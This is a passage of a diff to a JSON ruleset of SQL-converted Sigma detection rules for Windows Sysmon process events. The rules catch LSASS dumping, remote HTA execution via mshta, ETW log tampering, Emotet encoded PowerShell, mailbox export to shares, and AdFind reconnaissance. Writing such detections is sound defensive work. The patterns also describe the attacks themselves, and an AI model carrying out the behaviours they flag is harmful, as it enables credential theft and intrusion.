"status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" - }, - { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", - "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "test", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1053.005" + "attack.t1546" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.006" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.005" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "status": "test", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "status": "test", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": 